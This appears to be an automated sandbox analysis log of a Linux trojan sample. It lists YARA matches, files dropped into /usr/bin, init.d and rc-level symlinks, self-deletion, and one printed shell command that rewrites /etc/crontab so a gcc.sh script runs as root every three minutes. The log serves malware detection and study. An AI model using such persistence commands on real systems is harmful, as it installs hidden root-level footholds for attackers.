                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5340, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5342, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5345, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5348, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5357, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5360, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5362, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5365, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5368, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5374, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5377, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5379, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5382, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5384, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5391, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5394, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5397, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5399, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5402, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5413, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5416, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5418, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5420, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5427, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5430, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5433, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5435, type: MEMORYSTR
                        Source: Yara matchFile source: /usr/bin/zhoomtcmjp, type: DROPPED
                        Source: Yara matchFile source: /usr/lib/libudev.so, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/ppozyahgxh, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/qkswzskzvm, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/vxnottgwjc, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/akxqlcphlm, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/uprkxpaulc, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/hhmykaposi, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/lzqmjtjpqw, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/xnntpqonav, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/bingytdcwk, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/wqgmxyrptd, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/kexmeeeolw, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/mligukcpvp, type: DROPPED
                        Source: Yara matchFile source: /usr/bin/ybfpvjxtlx, type: DROPPED
                        Source: ELF static info symbol of initial sample.symtab present: no
                        Source: classification engineClassification label: mal100.troj.evad.lin@0/21@2/0
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)/run/gcc.pid: piknazyenpjicszawrmivxqfqrvfnjheJump to behavior

                        Persistence and Installation Behavior:

                        barindex
                        Sample tries to persist itself using System V runlevelsShow sources
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/rc1.d/S90XZFWLZVF1Z -> /etc/init.d/XZFWLZVF1ZJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/rc2.d/S90XZFWLZVF1Z -> /etc/init.d/XZFWLZVF1ZJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/rc3.d/S90XZFWLZVF1Z -> /etc/init.d/XZFWLZVF1ZJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/rc4.d/S90XZFWLZVF1Z -> /etc/init.d/XZFWLZVF1ZJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/rc5.d/S90XZFWLZVF1Z -> /etc/init.d/XZFWLZVF1ZJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/rc.d/rc1.d/S90XZFWLZVF1Z -> /etc/init.d/XZFWLZVF1ZJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/rc.d/rc2.d/S90XZFWLZVF1Z -> /etc/init.d/XZFWLZVF1ZJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/rc.d/rc3.d/S90XZFWLZVF1Z -> /etc/init.d/XZFWLZVF1ZJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/rc.d/rc4.d/S90XZFWLZVF1Z -> /etc/init.d/XZFWLZVF1ZJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/rc.d/rc5.d/S90XZFWLZVF1Z -> /etc/init.d/XZFWLZVF1ZJump to behavior
                        Sample tries to persist itself using cronShow sources
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/cron.hourly/gcc.shJump to behavior
                        Source: /bin/sh (PID: 5223)File: /etc/crontabJump to behavior
                        Source: /bin/sed (PID: 5224)File: /etc/crontabJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/lib/libudev.soJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/vxnottgwjcJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/wqgmxyrptdJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/qkswzskzvmJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/uprkxpaulcJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/akxqlcphlmJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/mligukcpvpJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/kexmeeeolwJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/hhmykaposiJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/ppozyahgxhJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/ybfpvjxtlxJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/bingytdcwkJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/xnntpqonavJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/lzqmjtjpqwJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/zhoomtcmjpJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File written: /usr/bin/prxseumwxzJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)Shell script file created: /etc/cron.hourly/gcc.shJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)Reads from proc file: /proc/statJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)Reads from proc file: /proc/meminfoJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)Reads from proc file: /proc/cpuinfoJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/5263/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/5266/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/5267/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2033/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2033/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2033/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1582/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1582/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2275/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2275/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2275/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/5260/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1612/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1612/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1612/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1579/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1579/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1699/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1699/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1699/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1335/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1335/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1698/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1698/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1698/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2028/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2028/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2028/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1334/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1334/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1576/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1576/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2302/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2302/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2302/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/3236/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/3236/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/3236/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2025/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2025/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2025/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2146/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2146/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2146/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/912/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/912/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/759/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/759/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2307/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2307/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2307/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/918/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/918/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/5036/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/5036/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/5036/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1594/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1594/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2285/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2285/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2285/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2281/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2281/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2281/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1349/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1349/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1623/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1623/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1623/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/761/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/761/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1622/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1622/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1622/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/884/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/884/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1983/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1983/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1983/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2038/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2038/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2038/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1586/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1586/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1465/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1465/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1344/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1344/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1860/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1860/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1860/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1463/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1463/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2156/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2156/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/2156/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/800/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/800/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/801/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/801/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1629/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1629/fdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File opened: /proc/1629/fdJump to behavior
                        Source: /sbin/update-rc.d (PID: 5228)Systemctl executable: /bin/systemctl -> systemctl daemon-reloadJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5223)Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"Jump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)Writes shell script file to disk with an unusual file extension: /etc/init.d/XZFWLZVF1ZJump to dropped file

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Drops files in suspicious directoriesShow sources
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /etc/init.d/XZFWLZVF1ZJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/vxnottgwjcJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/wqgmxyrptdJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/qkswzskzvmJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/uprkxpaulcJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/akxqlcphlmJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/mligukcpvpJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/kexmeeeolwJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/hhmykaposiJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/ppozyahgxhJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/ybfpvjxtlxJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/bingytdcwkJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/xnntpqonavJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/lzqmjtjpqwJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/zhoomtcmjpJump to dropped file
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/prxseumwxzJump to dropped file
                        Sample deletes itselfShow sources
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/vxnottgwjcJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/wqgmxyrptdJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/qkswzskzvmJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/uprkxpaulcJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/akxqlcphlmJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/mligukcpvpJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/kexmeeeolwJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/hhmykaposiJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/ppozyahgxhJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/ybfpvjxtlxJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/bingytdcwkJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/xnntpqonavJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/lzqmjtjpqwJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/zhoomtcmjpJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/prxseumwxzJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/diqdbkzgztJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/nykjhwzoixJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/ygkfhnfkvxJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/fbeozxrvfkJump to behavior
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)File: /usr/bin/ekqpdizncqJump to behavior
                        Source: /usr/bin/vxnottgwjc (PID: 5238)File: /usr/bin/vxnottgwjcJump to behavior
                        Source: /usr/bin/vxnottgwjc (PID: 5242)File: /usr/bin/vxnottgwjcJump to behavior
                        Source: /usr/bin/vxnottgwjc (PID: 5246)File: /usr/bin/vxnottgwjcJump to behavior
                        Source: /usr/bin/vxnottgwjc (PID: 5249)File: /usr/bin/vxnottgwjcJump to behavior
                        Source: /usr/bin/vxnottgwjc (PID: 5250)File: /usr/bin/vxnottgwjcJump to behavior
                        Source: /usr/bin/wqgmxyrptd (PID: 5256)File: /usr/bin/wqgmxyrptdJump to behavior
                        Source: /usr/bin/wqgmxyrptd (PID: 5260)File: /usr/bin/wqgmxyrptdJump to behavior
                        Source: /usr/bin/wqgmxyrptd (PID: 5263)File: /usr/bin/wqgmxyrptdJump to behavior
                        Source: /usr/bin/wqgmxyrptd (PID: 5266)File: /usr/bin/wqgmxyrptdJump to behavior
                        Source: /usr/bin/wqgmxyrptd (PID: 5267)File: /usr/bin/wqgmxyrptdJump to behavior
                        Source: /usr/bin/qkswzskzvm (PID: 5283)File: /usr/bin/qkswzskzvmJump to behavior
                        Source: /usr/bin/uprkxpaulc (PID: 5292)File: /usr/bin/uprkxpaulcJump to behavior
                        Source: /usr/bin/uprkxpaulc (PID: 5295)File: /usr/bin/uprkxpaulcJump to behavior
                        Source: /usr/bin/uprkxpaulc (PID: 5298)File: /usr/bin/uprkxpaulcJump to behavior
                        Source: /usr/bin/uprkxpaulc (PID: 5299)File: /usr/bin/uprkxpaulcJump to behavior
                        Source: /usr/bin/akxqlcphlm (PID: 5307)File: /usr/bin/akxqlcphlmJump to behavior
                        Source: /usr/bin/akxqlcphlm (PID: 5311)File: /usr/bin/akxqlcphlmJump to behavior
                        Source: /usr/bin/akxqlcphlm (PID: 5314)File: /usr/bin/akxqlcphlmJump to behavior
                        Source: /usr/bin/akxqlcphlm (PID: 5315)File: /usr/bin/akxqlcphlmJump to behavior
                        Source: /usr/bin/mligukcpvp (PID: 5320)File: /usr/bin/mligukcpvpJump to behavior
                        Source: /usr/bin/mligukcpvp (PID: 5323)File: /usr/bin/mligukcpvpJump to behavior
                        Source: /usr/bin/mligukcpvp (PID: 5328)File: /usr/bin/mligukcpvpJump to behavior
                        Source: /usr/bin/mligukcpvp (PID: 5331)File: /usr/bin/mligukcpvpJump to behavior
                        Source: /usr/bin/mligukcpvp (PID: 5334)File: /usr/bin/mligukcpvpJump to behavior
                        Source: /usr/bin/kexmeeeolw (PID: 5339)File: /usr/bin/kexmeeeolwJump to behavior
                        Source: /usr/bin/kexmeeeolw (PID: 5344)File: /usr/bin/kexmeeeolwJump to behavior
                        Source: /usr/bin/kexmeeeolw (PID: 5347)File: /usr/bin/kexmeeeolwJump to behavior
                        Source: /usr/bin/kexmeeeolw (PID: 5350)File: /usr/bin/kexmeeeolwJump to behavior
                        Source: /usr/bin/kexmeeeolw (PID: 5351)File: /usr/bin/kexmeeeolwJump to behavior
                        Source: /usr/bin/hhmykaposi (PID: 5359)File: /usr/bin/hhmykaposiJump to behavior
                        Source: /usr/bin/hhmykaposi (PID: 5363)File: /usr/bin/hhmykaposiJump to behavior
                        Source: /usr/bin/hhmykaposi (PID: 5367)File: /usr/bin/hhmykaposiJump to behavior
                        Source: /usr/bin/hhmykaposi (PID: 5370)File: /usr/bin/hhmykaposiJump to behavior
                        Source: /usr/bin/hhmykaposi (PID: 5371)File: /usr/bin/hhmykaposiJump to behavior
                        Source: /usr/bin/ppozyahgxh (PID: 5376)File: /usr/bin/ppozyahgxhJump to behavior
                        Source: /usr/bin/ppozyahgxh (PID: 5381)File: /usr/bin/ppozyahgxhJump to behavior
                        Source: /usr/bin/ppozyahgxh (PID: 5386)File: /usr/bin/ppozyahgxhJump to behavior
                        Source: /usr/bin/ppozyahgxh (PID: 5387)File: /usr/bin/ppozyahgxhJump to behavior
                        Source: /usr/bin/ppozyahgxh (PID: 5388)File: /usr/bin/ppozyahgxhJump to behavior
                        Source: /usr/bin/ybfpvjxtlx (PID: 5393)File: /usr/bin/ybfpvjxtlxJump to behavior
                        Source: /usr/bin/ybfpvjxtlx (PID: 5396)File: /usr/bin/ybfpvjxtlxJump to behavior
                        Source: /usr/bin/ybfpvjxtlx (PID: 5401)File: /usr/bin/ybfpvjxtlxJump to behavior
                        Source: /usr/bin/ybfpvjxtlx (PID: 5404)File: /usr/bin/ybfpvjxtlxJump to behavior
                        Source: /usr/bin/ybfpvjxtlx (PID: 5405)File: /usr/bin/ybfpvjxtlxJump to behavior
                        Source: /usr/bin/bingytdcwk (PID: 5410)File: /usr/bin/bingytdcwkJump to behavior
                        Source: /usr/bin/bingytdcwk (PID: 5415)File: /usr/bin/bingytdcwkJump to behavior
                        Source: /usr/bin/bingytdcwk (PID: 5421)File: /usr/bin/bingytdcwkJump to behavior
                        Source: /usr/bin/bingytdcwk (PID: 5423)File: /usr/bin/bingytdcwkJump to behavior
                        Source: /usr/bin/bingytdcwk (PID: 5424)File: /usr/bin/bingytdcwkJump to behavior
                        Source: /usr/bin/xnntpqonav (PID: 5429)File: /usr/bin/xnntpqonavJump to behavior
                        Source: /usr/bin/xnntpqonav (PID: 5432)File: /usr/bin/xnntpqonavJump to behavior
                        Source: /usr/bin/xnntpqonav (PID: 5437)File: /usr/bin/xnntpqonavJump to behavior
                        Source: /usr/bin/xnntpqonav (PID: 5440)File: /usr/bin/xnntpqonavJump to behavior
                        Source: /usr/bin/xnntpqonav (PID: 5441)File: /usr/bin/xnntpqonavJump to behavior
                        Source: /usr/bin/lzqmjtjpqw (PID: 5447)File: /usr/bin/lzqmjtjpqwJump to behavior
                        Source: /usr/bin/lzqmjtjpqw (PID: 5452)File: /usr/bin/lzqmjtjpqwJump to behavior
                        Source: /usr/bin/lzqmjtjpqw (PID: 5455)File: /usr/bin/lzqmjtjpqwJump to behavior
                        Source: /usr/bin/lzqmjtjpqw (PID: 5458)File: /usr/bin/lzqmjtjpqwJump to behavior
                        Source: /usr/bin/lzqmjtjpqw (PID: 5459)File: /usr/bin/lzqmjtjpqwJump to behavior
                        Source: /usr/bin/zhoomtcmjp (PID: 5464)File: /usr/bin/zhoomtcmjpJump to behavior
                        Source: /usr/bin/zhoomtcmjp (PID: 5471)File: /usr/bin/zhoomtcmjpJump to behavior
                        Source: /usr/bin/zhoomtcmjp (PID: 5474)File: /usr/bin/zhoomtcmjpJump to behavior
                        Source: /usr/bin/zhoomtcmjp (PID: 5475)File: /usr/bin/zhoomtcmjpJump to behavior
                        Source: /usr/bin/zhoomtcmjp (PID: 5476)File: /usr/bin/zhoomtcmjpJump to behavior
